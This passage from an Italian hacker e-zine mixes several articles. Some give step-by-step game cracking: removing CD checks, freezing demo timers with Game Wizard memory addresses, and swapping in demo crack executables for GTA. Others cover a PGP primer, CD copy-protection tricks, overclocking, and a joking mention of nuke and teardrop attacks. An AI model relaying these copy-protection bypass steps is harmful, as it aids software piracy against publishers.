non riguardano il gioco vero e proprio. Una volta che il gioco sta su hard disk provo inanzitutto a saltare il cd-check con uno dei modo sopra elencati dopo di che passo a ripparlo. Molti giochi al loro interno hanno dei menu che consentono di eliminare la musica dal gioco i filmati, attivando queste opzioni, salvando la configurazione, io potr gi tranquillamente eliminare i filmati e le musiche wav (riconoscerli non difficile, di solito sono contenuti in apposite sottodirectory con nomi tipi Video, Music, Sound, e poi generalmente okkupano decine di mega). Se i giochi in questione non presentano tali opzioni al loro interno posso utilizzare vari sistemi (nel 90% l'opzione musica abilitata/disabilitata presente quindi prendero' in considerazione vari sistemi per rippare i filmati): - cancellare i vari file di filmato e provare a lanciare il gioco senza di questi - cancellare i filmati e creare dei file di lunghezza 0 con stesso nome e estensione di quelli reali - cancellare i vari file, tenere solo quello che okkupa il minor numero di K e fare varie copie di questo cambiandogli per nome con quelli dei vari file che abbiamo cancellato Stesso discorso pu valere per le musiche in wav, o i dialoghi presenti all'interno dei giochi. Ripeto che comunque molti giochi al loro interno hanno le opzioni per disabilitare queste cose quindi_ Be credo che sia tutto. Il gioco lo avete sprotetto, le cose in pi le avete eliminate, non vi resta che zippare i vostri giochi_ Vi assicuro che avrete molta soddisfazione. PARTE 3: USARE IL GAME WIZARD 32 PRO PER SPROTEGGERE I GIOCHI BY CAVALLO Eh si', sono riuscito a infilarmi anche in questa guida, spero che non dispiaccia a nessuno !!! Andiamo ad ANAL-izzare :-) il funzionamento del Game Wizard 32 Pro 3.0, molto utile x poter cheatare con i giochi ma piu' che questo mi interessa una sua applicazione diciamo piu' cattiva; illustro comunque i possibili utilizzi del suddetto programma (che per chi non lo sapesse gira sotto DOS): GW permette di cercare nella memoria dei particolari valori che ci servono (es. Munizioni, Vita etc..), settarli al valore che desideriamo, "freezarli" cioe' bloccarli su un dato valore, salvare frame (immagini) del gioco che ci interessa, editare manualmente la memoria Ram, salvare la situazione totale della memoria del gioco che ci interessa cosicche' saremo in grado in futuro di ritornare nella stessa situazione di gioco (utile per i giochi che non permettono di salvare la posizione ma ATTENZIONE, se salvate tutta la memoria per es. 16mega, vi ritroverete un file di dimensioni considerevoli sull' HD!) e altre cosette tipo un File Manager integrato, la possibilita' di bloccare il PC con una password antisgamo e di poter crashare al Dos in caso di impasto del computer (cosa non molto rara...), e infine settare la velocita' dei giochi (utile con quelli vecchi che sui PC moderni sgheggiano troppo e fanno cagare). La versione Professional del GW permette di effettuare ricerche in 3 modalita': Basic / Intermediate / Advance e su 5 Range di Memoria : Conventional / 4 Mb / 8 Mb / 16 Mb / Max Tralasciando i range di memoria (anche se consiglio 4/8 Mb) focalizziamo la nostra attenzione sulle modalita' che riassumerei cosi' : Basic : ricerca i valori proprio come li avete messi cioe' se io metto 5 allora il GW pensa "Cazzo, questo qui vuole proprio il valore 5" e ve lo cerca paro paro nella memoria (quanta ne avete scelta nel range); questa opzione va bene per valori fissi come Munizioni, Vite, Cuoricini, Pompini etc... Intermediate : ricerca i valori "approssimandoli"; diciamo che io lo utilizzo su base percentuale (non so se si riesca ad usare in altro modo) cioe' il GW, si' sempre lui, pensa "Miiiii, kisto qui e' nu tipo tosto, se dice 25 e poi 50 e poi 100 intende dire che l'ultimo valore e' circa 4 volte il primo e 2 volte o' secondo". Consigliato per cercare valori tipo Barra di Energia e simili.. Advance : detto anche dai matematici "metodo Cartesio" : ricerca solo permanenze e variazioni dello stato mentale di Cavallo, no volevo dire della memoria permettendo cosi' di andare a cercare le cose piu' disparate (e' un po' un casino da usare) "Si ma cazzo non ci hai ancora detto come si usa sto cazz'i'programma.." Ok, un momento, arrivo al dunque: Il programma e' un TSR (Terminate & Stay Resident, minchia come sono bravo!!) cioe' resta residente in memoria aspettando che voi lo chiamate premendo il tasto \ quello di fianco all' 1 sopra al TAB, la backslash o com'o'cazz'se chiama. Una volta chiamato scegliete la 1ma opzione, e il tipo di ricerca e cercate quello che volete, poi ritornate al gioco, lo usate, richiamate il GW e cercate il valore ancora dicendo che valore ha (nel beginner e nel intermediate) o se e' cambiato o meno nell' Advance. Non basta fare questa procedura una volta sola in quanto il GW "filtra" la memoria volta dopo volta e quindi bisogna iterare la procedura (n-r)^ volte (ehm, scherzo, intendo dire un po' di volte) x trovare lo/gli indirizzo/i esatti. P.S. Come penso avrete capito piu' avanzate con il livello di "penetrazione mnemonica" (beg->int->adv) piu' tempo ci vuole a trovare gli indirizzi esatti. Comunque il programma ha un bel tutor x imparare ad usarlo quindi mi sono gia' fin troppo rotto le palle di star qui a spiegarvi come funziona il GW. Ora vi spiego un bell'utilizzo che ho fatto del GW nell'evitare il classico rompimento di coglioni del giocare con i Demo; prendero' 2 esempi molto simili (anche xche' lo ho fatto con questi e basta!!): NBA Live '95 e Fifa '97 : io mi domando e dico : "Ma perche' diavolo devo giocare solo 1 o 2 minuti a un gioco per provarlo? StoCazzo ! io ci voglio giocare fin quando mi pare !!!" Infatti Nba Live '95 (lo so un po' vecchietto ma penso si riesca anche con la 97 e magari con la 98) : limite di tempo 2 tempi da 1 minuto (cazzo ma si puo' uno inizia a giocare e gia' scattano i secondi). Ma anche Fifa '97 , 1 solo tempo da 2 minuti, che merda e' ? Ecco quindi che il prode Cavallo parte col suo fido GW32 in sella ad eliminare le fetide limitazioni : dopo un inutile tentativo con l'advanced mode sono giunto alla constatazione che settando una bella ricerchina intermediate ce la si cava con scioltezza: nel caso di Nba Live basta settare come ricerche il minuto di partenza come 100 (%) a 30 secondi stoppate e mettete 50 (%) e alla fine 0, ripetete un po' di volte, magari inframezzando con varianti tipo 75(%) o 25(%) rispettivamente a 45 e 15 sec. Smanettando un po' cosi' arriverete ad avere mano a mano sempre meno indirizzi, quando ve ne restano solo 3-4 potete usare l'opzione per importarli direttamente (non ricordo come si chiami, e non ho voglia di star qui a cercarla) nella Table of Memory Locations dove potete cambiare il valore o freezarlo, io consiglio di salvare la tabella con un nome, farvi un bel batch file che chiami il gw e poi il demo del gioco, cosi' appena parte la partita dimostrativa (occhio la partita, non il demo !!) premete il tasto backslash e andate su table of.. loadate la tabella prefatta e settate il tempo a quello che volete (non ricordo che base strana usi il gioco, fate un po' di prove). Lascio ai fidi lettori :-) come esercizio la semplice ricerca dei falli e/o dei punti delle 2 squadre (non oso pensare se si possa taroccare qcos'altro, fatemi sapere !!). Per Fifa'97 il discorso e' lo stesso, l'unica cosa che essendo un gioco di calcio (ma va') il tempo va da 0 a 2:00 quindi dovete settare 0 a 0:00 e 100 a 2:00 e quindi il taroccos viene piu' smarzo xche' le alternative sono o bloccare il timer o riportarlo indietro quando volete (e piu' bello il lavoro con Nba, fidatevi,si setta il tempo all'inizio del tempo e poi si gioca..) Visto che sono buono vi do anche gia' gli indirizzi di memoria : Nba Live '95 Time : BYTE *00232D31 Fifa '97 Time : BYTE *00277784 Per falli o altre cose divertitevi voi (nel senso buono, non e' un invito all'omosessualita' :-)) !!! NOTE: Tutti gli errori di itagliano, tutti gli orrori ortografici, tutte le cazzate dette nelle Parti 1 e 2 sono copirait del Dr. Slump. Quindi se su questa guida ritenete che ci siano scritte troppe cazzate o che usando uno dei metodi sopra elencati fate qualche cazzata, che vi devo dire: STI CAZZI Bel discorso del cazzo questo no? Non so se l'illustre Cavallo si associera' con queste note, ma conoscendolo... Piu' alcolico che mai Dr. Slump Cavallo De Cavallis Dr_Slump ͻ CRACKiNG CRACK PER GRAND THET AUT0 ͼ VERSi0Ni 8 iT, 24 iT, 3DX Questo metodo vi permettera' di crackare la versione DOS di GTA. Cosi' facendo potrete aggirare la protezione del gioco e tenerlo su Hard Disk o masterizzarlo. Prima di tutto, procurarsi via Internet i Time Crack per tutte e tre le demo (basta andare in Altavista e cercare 'Grand Theft Auto' - www.altavista.digital.com). * Installate la versione completa di GTA prima di procedere. 1) Scompattate tutti i file contenuti nel file .ZIP del crack 3Dfx, per maggiori informazioni leggere il readme.txt - e' molto importante. 2) Copiare i file .EXE contenuti nei file .ZIP dei crack 8 e 24 bit nella sottodirectory \GTADOS. Anche il file DEMOFX.EXE (crack 3dfx) deve trovarsi in GTA\GTADOS. 3) Ora rinominare i file come segue: DEMO8.EXE --> GTA8.EXE DEMO24.EXE --> GTA24.EXE DEMOFX.EXE --> GTAFX.EXE 4) Prendere il file ENGLISH.FXT contenuto nel crack 3Dfx e spostarlo in GTA\GTADATA ricoprendo l'originale. 5) Ora avete completato il crack !!! GTA girera' pensando di essere la demo, ma avra' tutti i dati accessibili senza limitazioni e girera' senza il cd. PUCK ͻ MiSC GUiDA ALLA CRiTT0GRAFiA ͼ A CHiAVE PULiCA - I PARTE 1. -=> Intro <=- Ogni persona che ha a che fare con l'h/p/c/v/a/c - e non solo ;) - prima o poi si trova necessariamente di fronte alla necessita' di scambiare informazioni confidenziali con altri o anche semplicemente di conservare dati in suo possesso in modo che solo lui vi possa accedervi. Il problema per chi utilizza la crittografia convenzionale e' che di fronte all'esigenza di inviare informazioni con altri in un canale definibile insicuro (come e' internet) non si hanno a disposizione altri canali sicuri (potrebbe essere ad esempio un appuntamento di persona in un luogo riservato) per comunicare quale e' la parola chiave o altre informazioni che permettano l'accesso al file crittato. Grazie a un nuovo metodo introdotto al pubblico (prima era sviluppato soltanto su commissione da societa' specializzate) da Philip Zimmermann, tale inconveniente e' stato ovviato. Zimmermann ha avuto la brillante idea di creare un programma gratuito che permettesse a tutti di utilizzare un metodo nuovo unito ad una elevata sicurezza che la lunghezza delle chiavi offre, usando la crittografia a chiave pubblica. E' questo una dei fattori che hanno contributo alla diffusione cosi' capillare del noto programma Pretty Good Privacy, chiamato comunemente PGP. 2. -=> Perche' <=- Il punto cruciale su cui si basa il pensiero di Zimmermann e' il seguente: premesso che la privacy e' un diritto dell'uomo che sta alla base delle societa' tecnologicamente evolute e deve essere tutelato, accade sempre piu' frequentemente con l'introduzione di nuove tecnologie che tale diritto non venga riconosciuto; e' indispensabile quindi utilizzare un metodo per garantire la riservatezza, sia che si utilizzi la crittografia per spedire gli auguri di buon anno, piuttosto che un manuale su come costruire una bomba atomica e PGP e' un programma che permette di farlo. Criminalizzare l'utilizzo di internet abbinato alla crittografia perche' non controllabile sarebbe come vietare di utilizzare il telefono poiche' mezzo attraverso il quale e' possibile ad esempio organizzarsi per attivita' illecite; sta all'utente in ogni caso decidere che uso farne. 3. -=> Come funzia <=- Il metodo della crittografia a chiave pubblica consiste nella generazione di due chiavi, una segreta (protetta da password) e una pubblica che contengono tutte le informazioni necessarie a codificare, firmare, e decodificare i messaggi o file che dir si voglia. Questa coppia di chiavi generata pseudocasualmente mediante una funzione di PGP tramite un algoritmo matematico garantisce che: * un messaggio codificato con una chiave della coppia puo' essere decodificato solo con l'altra chiave della stessa coppia * non e' possibile, data una chiave della coppia, ricavare l'altra Fatte queste premesse diventa piu' semplice capire le funzioni offerte da PGP. 4. -=> Funzioni e caratteristiche <=- I vantaggi ottenuti da tale sistema permettono di avere: * Privacy: Se User1 vuole inviare un messaggio a User2 lo codifica usando la chiave pubblica di quest'ultimo. Solo User2, che ha la corrispondente chiave segreta, e' in grado di decodificare e leggere il messaggio. * Autenticazione del mittente: User1 quando codifica il suo messaggio con la propria chiave privata certifica che il messaggio e' stato scritto proprio da User1, l'unica a possedere la corrispondente chiave segreta. User1 ha quindi posto la sua "firma" elettronica sul messaggio. * Autenticazione del mittente e del messaggio: E' possible autenticare, oltre al mittente anche il contenuto del messaggio; User1 effettua un "hashing" del suo messaggio cioe' mediante una funzione unidirezionale, da un certo messaggio ricava un valore di lunghezza fissa, detto hash, che viene inserito nel messaggio/file (una sorta di checksum). Se il messaggio viene alterato, l'hash non corrisponde piu'. Se , una volta effettuata la decodifica, messaggio ed hash si corrispondono, si e' sicuri che nessuno dei due e' stato alterato in qualche maniera. In pratica, la firma elettronica realizzata dal PGP effettua sempre l'autenticazione sia del mittente sia del messaggio. Essa ha dunque le stesse funzioni della firma ordinaria su un documento cartaceo. * Trasmissione della chiave: Poiche' con la crittografia a chiave pubblica non c'e' il problema della trasmissione di una chiave per entrambe le funzioni di codifica e decodifica, ma ce ne sono due separate non si pone il problema di dovere trasmettere in modo sicuro quella chiave. Ogni utente deve semplicemente tenere al sicuro la propria chiave segreta, e diffondere liberamente senza alcun problema la propria chiave pubblica. 5. -=> Cosa fa PGP quando codifica un messaggio <=- Il PGP utilizza una intera collezione di algoritmi, tra i piu' sicuri ed internazionalmente conosciuti nel campo della crittografia. Si suppone quindi di partire da un messaggio che deve essere firmato e codificato prima di essere spedito. La sequenza delle operazioni che PGP effettua sono : a) PGP applica l'algoritmo di hashing MD5 per generare l'hash del messaggio, avente lunghezza fissa pari a 128 bit. L'hash viene attaccato al messaggio. b) PGP applica l'algoritmo di compressione dati ZIP per comprimere l'insieme messaggio piu' hash ottenuto in A. c) PGP applica un algoritmo di generazione numeri casuali per generare una sequenza di 128 bit casuali. d) PGP applica l'algoritmo di crittografia convenzionale IDEA per codificare il messaggio compresso ottenuto in B, usando come chiave ("session key") il numero casuale generato in C. e) PGP applica l'algoritmo di crittografia a chiave pubblica RSA per codificare la session key. Il risultato viene attaccato al messaggio codificato ottenuto in D. f) PGP applica l'algoritmo di ASCII Armor Radix-64 per trasformare il messaggio ottenuto in E in modo che esso contenga solo caratteri ASCII bassi. Questo algoritmo trasforma ogni gruppo di tre bytes in un gruppo di quattro bytes. Il messaggio ottenuto in F e' quello finale, che puo' essere inviato per e-mail. Il destinatario esegue la sequenza inversa di operazioni. 6. -=> Greets <=- Questa prima parte e' finita...appuntamento quindi alla prossima uscita di BFI. Se volete chiarimenti, informazioni, o altro scrivetemi a Blinking@mindless.com -----BEGIN PGP PUBLIC KEY BLOCK----- Version: 2.6.3ia mQB9AzLEjzoAAAEDgMAZEm4vKqllKENI/8g7x8XEaQppZwgobIXGK8hprLMMnEKA x9b+m0dIIHm1iTzT+E+kO1xsgGIM8GuzNoKYp9vg/FBqkWX652pKALNElN2R9Bfe XPvZTXcZZWmWCXFkW3CzCD+5BXcB5337YowzUSEABRG0IEJsaW5raW5nIDxibGlu a2luZ0BtaW5kbGVzcy5jb20+iQCFAwUQM099XOd9+2KMM1EhAQErUAN/ctdkXk7D ge9i4MV1BBtqXeT0UXNVp0jLONVSndmDBC2m9C+bRLX0ACQ10avUtd0cxIF4BeWS vIekKu/5uYyCiNyIH+iEi7FUT6nj3cMrTNS0Z5u5gcIehijSzv48ANuiJndYrciH 0tGamijyz73gIQ== =IyQY -----END PGP PUBLIC KEY BLOCK----- Key Finger Print = 53 9E 03 F8 63 9F 40 08 46 9F B8 1C FF 3D A8 BB Key ID=8C335121 UIN ICQ=3068260 Se invece vi ho fatto solo incazzare potete farmi nuke, land, teardrop e tutto quello che volete quando sono collegato a internet (moooolto spesso), perche' tanto ho l'ip statico 127.0.0.1 ma sono sicuro che non lo farete ;-) !!! Special GreetZ a tutti i membZ di Soft Project, BeA & DjNoise. ByeZ. Blinking ͻ MiSC CENNi SULLA MASTERiZZAZi0NE ͼ In questo articolo tratteremo i cenni principali sulla masterizzazione: 1) Considerazioni generali 2) Utilizzo delle determinate apparecchiature + miei consigli 3) I cd protetti (cenni preliminari) 4) Protezione dei cd 5) Note sulla manutenzione in generale 1-Considerazioni Generali: Questo articolo vuole spiegare i fondamenti principali di questa nobile arte (mica tanto heheh), in quanto molte persone si sono trovate in difficolta' (booo cavoli loro). Voglio precisare che qui si parla di cdr-w scsi e non di quelli eide (bello skifoo). Ma ora passiamo al sodo della questione......... 2-Utilizzo delle Varie Apparecchiature (con i suoi dovuti problemi): Dopo aver acquistato il vostro cd-w + ovviamente la vostra bene amata scheda scsi (meglio se pci anche se la isa e' molto piu' stabile), dovrete controllare diversi parametri per avere una ottima masterizzazione. Se avete una sola unita' scsi, ovvero solo il masterizzatore, non occorre eseguire la terminazione dell'unita', mentre se avete anche lettori o hd scsi occorrera' eseguirla (ora vi spiego meglio !!). Voglio precisare che su qualunque unita' scsi c'e' un jumper che serve per eseguire questa maledetta terminazione (che palle !!). Quindi per farla breve l'unita' da terminare e' sempre l'ultima della catena scsi, per esempio se il vostro hd scsi e' collegato per ultimo al flat cable scsi dovra' essere terminato. Quindi molti problemi di masterizzazione possono essere evitati compiendo questa semplice operazione :) .... Certe volte capita di sentire gli amici che dicono "cazzo ho bruciato un cd porco dio.........." per evitare questi problemi ci sono una marea di piccole cose da controllare. La prima che mi viene in mente: molte masterizzazioni si interrompono per tanti motivi, che spieghero' in seguito, ma uno dei piu' importanti e' la velocita' del vostro hard disk ovvero il vostro transfer rate. Io consiglio un hd scsi in quanto possiede una miglior continuita' nell'afflusso dei dati, mentre uno eide potrebbe procurare alcuni problemi. Comunque non spaventatevi in quanto molte persone riescono a masterizzare con gli hd eide. Quindi se non avete i soldi per prendervi un hd scsi compratevi un eide con una buona velocita' di trasferimento, ma la cosa piu' importante e' che sia bufferizzato. Altra cosa molto importante e' che prima di masterizzare occorre eseguire un defrag (una deframmentazione) dei file interessati. Quindi in questo modo eviteremo il solito errore di buffer underun. Altra cosa molto importante e' di non toccare assolutamente la superfice del cd vergine e di rimuovere eventuali residui di polvere, in quanto la lente del lettore potrebbe deteriorarsi irreparabilmente quindi occhio !!!!! Quando installate la vostra apparecchiatura vi conviene aumentare l'areazione del vostro pc, installando ventole che funzionino ovviamente a bassa tensione in quanto la temperatura di lavoro non deve superare i 70 gradi. Soprattutto non collegate l'alimentazione della ventola su quella del vostro hd in quanto se essa si spegne anche il vostro hard disk farebbe la stessa cosa, magari rovinandosi irreparabilmente !!! 3- I CD Protetti (cenni preliminari) Voglio fare prima una breve premessa: molti pensavano che i cd playstation fossero protetti, smentisco subito questa stupida leggenda metropolitana: nessun cd playstation e' protetto (non ho mai avuto problemi nel copiarli)..... Molti affermavano che i playstation avevano una protezione sulle traccie audio....sono tutte cazzate. Invece e' verissimo che i cd copiati non fungono sulle play non modificate......... Le protezioni su cd-rom sono ben altra cosa !!!!!! Ecco.. ricordo un fatto che mi fece incazzare non poco: mi era capitato per le mani l'enciclopedia Gedea del valore di 3.000.000 e rotti, ovviamente cercai subito di copiarla........... Ma il fato volle che fosse protetta........ Buttai via una marea di cd vergini in quanto mi misi a fare qualsiasi tipo di prova... Ma il risultato fu vano.... Mi misi a controllare ogni file del cd.... Ne trovai uno di cui non ricordo bene il nome (non vi deve interessare perche' cambia da cd a cd).... Era nascosto e tra l'altro non si poteva copiare su nessuna unita', la sua dimensione era di circa 80 mega se non erro...... Sta di fatto che questo file internamente era vuoto !!!!!! Quindi se l'enciclopedia veniva installata dal cd originale funzionava perfettamente. Il perche' e' molto semplice in quanto in lettura il laser non accedeva minimamente a quel file...... Invece, per esempio durante la copia da cd a cd tramite lettore scsi, la masterizzazione si bloccava proprio quando si accedeva a quel file. Feci un'altra prova. Misi questo fottutissimo cd nel masterizzatore per eseguire una immagine del cd: ogni volta si ripeteva la solita cosa, quando si arrivava su quel file l'immagine si piantava..... Questa tecnica di protezione viene chiamata laserlocking...... Questo tipo di protezione e' fisico, quindi permanente senza possibilita' di sprotezione...... Per ora nessun programma di masterizzazione e' riuscito nella sua opera........ Quindi se vi trovate davanti ad una protezione del genere vi consiglio subito di lasciar perdere, in quanto buttereste via tempo e denaro.................... 4-Protezione dei CD: Finalmente siamo arrivati al dunque.......... Premetto che la protezione dei cd non e' un argomento facile..... e molto complesso da mettere in pratica. Ci sono due sistemi che ritengo fondamentali: 1)Consiste nel creare un file di testo di circa 30-40 mb totalmente vuoto. Mi spiego meglio: per fare questo cosidetto file possiamo utilizzare il debug del dos... Dopo averlo creato, dobbiamo munirci di un software dedicato alla masterizzazione (vi consiglio il gear 4.0 o superiore che, a differenza dell'easy cd, consente di nascondere i file a nostro piacimento.....). Dopo aver creato questo file occorre lanciare il prog di masterizzazione, creare un cd multi sessione e nella prima sessione scrivere un parte dei dati, poi aprire un'altra sessione e far scrivere il sudetto file txt, dopodiche' far scrivere i dati rimanenti e chiudere definitivamente la sessione del cd.... In questo caso abbiamo ottenuto un cd protetto..... Ma non simile al laserlocking............ 2)La seconda "teoria che deve essere ancora sperimentata" e' quella di riuscire a rovinare un file con estensione tmp... in modo da non poterlo copiare sul nostro hd.. il procedimento e' sempre quello di prima...........utilizzando sempre il nostro buon gear 4.0 . 5-note sulla manutenzione di un cd-r : 1)Ricordarsi di tenere il vostro cd-r in un ambiente che sia ben ventilato. 2)Pulire sempre la superfice dei vostri cd (sia registrabili che non) in quando possono sporcare la lente del laser...e dare seri problemi... 3)Installare il vostro cd-r in un luogo privo di vibrazioni. 4)Non collocare l'unita', se esterna, vicino ad una stampante. 5)Togliere il cd prima di spostare l'apparecchiatura.. in questo modo la testina restera' ben fissata per il trasporto. 6)Non toccare la superfice dei cd in quanto sono privi di protezione. 7)Non eseguire piu' di due masterizzazioni una dietro l'altra.. in quanto potremmo far surriscaldare l'apparecchio. 8)Avere sentimento.....(il mio primo comandamento vale per tutte le cose in generale) e se non capite cosa significa chiedetemelo di persona... :)) Anche se quello che ho scritto puo' sembrarvi poco, cio' vi servira' per fare le vostre prove...... Comunque questo argomento verra' ampliato nella seconda parte dell'articolo che uscira' nel secondo numero della rivista.... Wrote by hal9000 Per qualsiasi spiegazione e-mail : hal9@cryogen.com Ciao a tutti !!!! Hal9000 ͻ MiSC 0VERCL0CK ͼ CONSIDERAZIONI GENERALI: 1)Con questo termine ci si riferisce a quella operazione che forza un componente elettronico a lavorare a frequenze maggiori da quelle nominali (ma comunque ampiamente tollerabili). Qualsiasi componente puo' essere spinto al limite, ma generalmente questa tortura in un PC e' riservata principalmente alla CPU. 2)Sottoponendo un componente elettronico a tale stress, anche se comunque tollerabile, si possono avere delle controindicazioni. Per prima cosa la temperatura del componente aumenta. Cio' e' dovuto al fatto che, se una CPU a 66Mhz in un tempo T1 esegue un numero N1 di operazioni, ad una frequenza maggiore, diciamo 80Mhz, nel medesimo tempo T1 eseguira' un numero N2 di operazioni maggiore di N1, quindi produrra' piu' calore, che deve essere in un qualche modo smaltito, pena pericolosi surriscaldamenti. Inoltre, spingendo i componenti elettronici oltre i limiti imposti dalla fisica, si possono infliggere danni irreparabili ai transistor. Questo, ovviamente, in teoria ! 3)A parte il buon senso che puo' evitare di sottoporre il surriscaldamento della CPU oggetto di overclocking (come in tutte le cose, l'importante e' non esagerare.... Vedere tabella che segue) ci sono pero' dei piccoli accorgimenti che possono rendere l'overclocking un'operazione quasi completamente sicura. La maggioranza delle CPU dei PC monta un dissipatore metallico. L'ideale sarebbe andare in un negozio di elettronica ed acquistare un dissipatore (delle dimensioni adeguate!) dall'elevato coefficiente di dissipazione , ma generalmente quelli per CPU vanno gia' abbastanza bene. Assolutamente non deve mancare la ventolina. Inoltre io consiglio vivissimamente di acquistare del grasso di silicone, una pasta biancastra, e applicarne una patina tra la CPU ed il dissipatore. Infatti la pasta fa passare il calore molto meglio dello strato d'aria che inevitabilmente si crea. Questo vale anche per processori Pentium dal package plastico: appena un po' di pasta sulla parte metallica non guasta mai, anche se la CPU non funzionera' in overclock. Dopo alcune previ considerazioni, ora passiamo al sodo dell'argomento.......... hehehehe :) LE TECNICHE PRINCIPALI - BUS ISA: Molti BIOS permettono di impostare la frequenza del BUS ISA e delle periferiche ad esso collegate. La frequenza standard di 8 Mhz puo' essere aumentata agendo sui parametri del BIOS. In questo modo tutte le periferiche ISA dovrebbero lavorare piu' velocemente, ma non aspettatevi miracoli ...anche perche' adesso come adesso le periferiche ISA piu' critiche sono praticamente inesistenti (vedi controller e schede video). - I PROCESSORI 80486: Queste CPU possono essere overclockate, ma non sempre l'operazione riesce (subito si capisce: il PC o si blocca o si resetta). Fate molta attenzione ai 486 funzionanti a 5 Volt (come i DX2) ed utilizzate sempre un dissipatore con ventola sopra la CPU. Un Dx2 a 66 puo' essere portato a 80Mhz impostando il clock della scheda madre a 40Mhz, mentre un DX4 a 100Mhz potrebbe essere portato a 120 con il medesimo cambio di clock. Cio' e' dovuto al fatto che i 486DX2 hanno un moltiplicatore interno di frequenza, mentre i DX4 (che per la cronaca si chiamano solo DX4 e non 80486 DX4 ...) possono essere settati o per la duplicazione del clock, oppure per la triplicazione. Quindi, 80486 DX2 66Mhz = 33 X 2 80486 DX2 80 Mhz = 40 X 2 DX4 75 Mhz = 25 X 3 DX4 100Mhz = 33 X 3 oppure 50 X 2 Non provate a far funzionare i DX4 a 150Mhz ! Al massimo si possono spingere a 120Mhz. Ho ricevuto anche richieste di overclock di 486 senza moltiplicatore e/o triplicatore di clock, come ad esempio i 80486Dx e 80486Sx. Ovviamente il mio invito e' sempre quello di applicare un dissipatore con ventola, anche se si porta un 486 da 33 a 40Mhz. In questa affermazione ho un po' anticipato il tema dell'overclocking. Infatti io consiglio di overclockare i 486 solamente al "passo" successivo, vale a dire: da 25 a 33 Mhz da 33 a 40 Mhz (potete provare anche a 50, ma prestate molta attenzione alla temperatura del chip !!) da 40 a 50 Mhz Queste operazioni si effettuano cambiando i ponticelli della scheda madre, ma non tutte le motherboard hanno questa possibilita'. Manuale di istruzione alla mano, e' da verificare volta per volta. ATTENZIONE : Non dimenticate di impostare correttamenti gli stati di attesa di memoria e/o cache per la nuova frequenza. Non e' solo la CPU che puo' far fallire un overclocking .... - I PROCESSORI PENTIUM: Un discorso piu' complesso meritano queste CPU. Esse non dispongono di un moltiplicatore di frequenza: e' la scheda madre che permette la regolazione del clock della medesima e del fattore di moltiplicazione. Infatti un P120 e' ottenuto impostando la scheda madre a 60Mhz ed il fattore di moltiplicazione a 2X ( 60 X 2 = 120 Mhz ). Un P133 e' ottenuto sempre con fattore 2X ma con motherboard funzionante a 66Mhz (e Bus PCI a 33Mhz, ma questo si adegua automaticamente in base alla frequenza della scheda madre). Nota bene: Sono gia' arrivati in Italia i Pentium che non possono essere overclockati, per meglio dire, supportano SOLO il fattore di moltiplicazione per il quale sono stati "marchiati". Generalmente sono dei Pentium a 133Mhz, che anche se vengono spinti a 166Mhz, funzionano e mostrano da BIOS, sempre i 133Mhz. processore frequenza fattore di X frequenza esterna BUS PCI P90 90 1.5 60 30 P100 100 1.5 66 33 P120 120 2.0 60 30 P133 133 2.0 66 33 P150 150 2.5 60 30 P166 166 2.5 66 33 P180 180 3.0 60 30 P200 200 3,0 66 33 Prestate moltissima attenzione e fate bene i calcoli: prima di cambiare i ponticelli sulla scheda madre, ricontrollate tutto. Potete correre il rischio di spingere un P90 a 180Mhz ! Dopo queste precisazioni, andiamo ad esaminare i possibili overclocking, sempre che il vostro Pentium supporti ogni fattore di moltiplicazione (e c'e' solo un modo per accorgersene: provare): CPU Frequenza nominale Overclocking sicuro Overclocking spinto P75 75 90 100-120 P90 90 100 120 P100 100 120 133 P120 120 133 150-166 P133 133 150-166 180-200 P150 150 166 187.5-200 P166 166 180-187.5 200 o + P200 200 200 o + Comunque e' molto difficile stabilire se l'overclocking sia sicuro o meno. Personalmente ho visto Pentium a 133 andare a 180Mhz senza fare una piega, mentre dei P100 rifiutarsi di lavorare a 120Mhz. Se il computer funziona bene, dopo un'ora di lavoro, si puo' provare a toccare la parte metallica del dissipatore della CPU. Se e' "caldino" allora tutto e' OK, se e' caldo e' normale, se invece non si riesce a tener appogiato il dito per piu' di 5/6 secondi, allora: 1.provare ad applicare della pasta al silicone come descritto 2.la ventola e' nuova ? 3.l'alimentazione e' VRE o STD ? Provare quella STD.. 4.ridurre purtroppo il clock ... Molto consigliati sono gli overclocking 90 --> 100 ; 120 --> 133 e 150 --> 166 per poter sfruttare tutta la potenza di una scheda madre a 66Mhz e bus PCI a 33Mhz. Per chi invece avesse la possibilita' di testare la temperature della CPU (e lo consiglio caldamente, scusate il gioco di parole :-) tenga presente che: sino a 40C e' tutto OK !!! da 40 a 50C va bene da 50 a 60C potrebbe andare meglio sopra ai 60C .... ALT !!!!!! Spegnere tutto !! - NUOVE SCHEDE A 75 MHZ : Da un po' di tempo a questa parte si stanno diffondendo sempre piu' schede madri capaci di funzionare a 75Mhz, contro i 66 dei Pentium a 100, 133, 166 e 200Mhz. Generalmente montano chipset Triton 430VX, ma non e' raro trovare anche 430HX. Modello di punta : l'Asus P55T2P4 (disponibile anche in ATX), che oltre a supportare i Pentium MMX (addirittura permette di abbassare la tensione anche a 2.5Volt), dalla rev. 3.0 in poi, monta un chipset 430HX funzionante a 75Mhz e certe volte anche a 68 e 83Mhz. Se volete avere ulteriori informazioni riguardo la ponticellatura contattatemi via e-mail. Piu' che per prestazioni, ma su questo punto torneremo in seguito, si e' portato il bus a 75Mhz per supportare il Cyrix 6x86 P200+. Ed il BUS PCI ? Nonostante sulla carta il PCI potrebbe funzionare sino a notevoli frequenze di clock, attualmente il massimo e' di 33Mhz. Ma aumentato da 66 a 75Mhz anche il PCI ne risente e si porta cosi' a 37.5Mhz. INTEL non ha mai commentato questi "aggiornamenti" anche perche' sulla carta i chipset 430VX e 430HX non superano i 66Mhz. Il discorso, probabilmente, cambiera' per il 430TX. Se siete in possesso di una di questo piastre (basta consultarne il manuale) allora tenete presente che: Avendo come base 75Mhz si possono "creare" frequenza di clock molto strane. Infatti si puo' avere: 75 x 1.5 = CPU a 112.5 Mhz 75 x 2 = CPU a 150 Mhz 75 x 2.5 = CPU a 187.5 Mhz 75 x 3 = CPU a 225 Mhz Queste "nuove" frequenze si aggiungono quindi a quelle gia' note. Se la piastra dispone anche del settaggio a 83Mhz allora si ottengono nuove frequenze: 83 x 2 = CPU a 166 Mhz 83 x 2.5 = CPU a 208 Mhz 83 x 3 = CPU a 249 Mhz Un P166 potrebbe quindi essere spinto a 187.5, oppure un P200 portato a 207.5Mhz. Inoltre, se si considera che alcune CPU possono supportare solo il fattore di moltiplicazione per il quale sono state vendute (2x i P133) allora i piu' furbi si sono gia' resi conto che, sfruttando l'innalzamento del BUS, si mantiene costante il fattore di moltiplicazione ma la frequenza della CPU aumenta.... Quindi, per 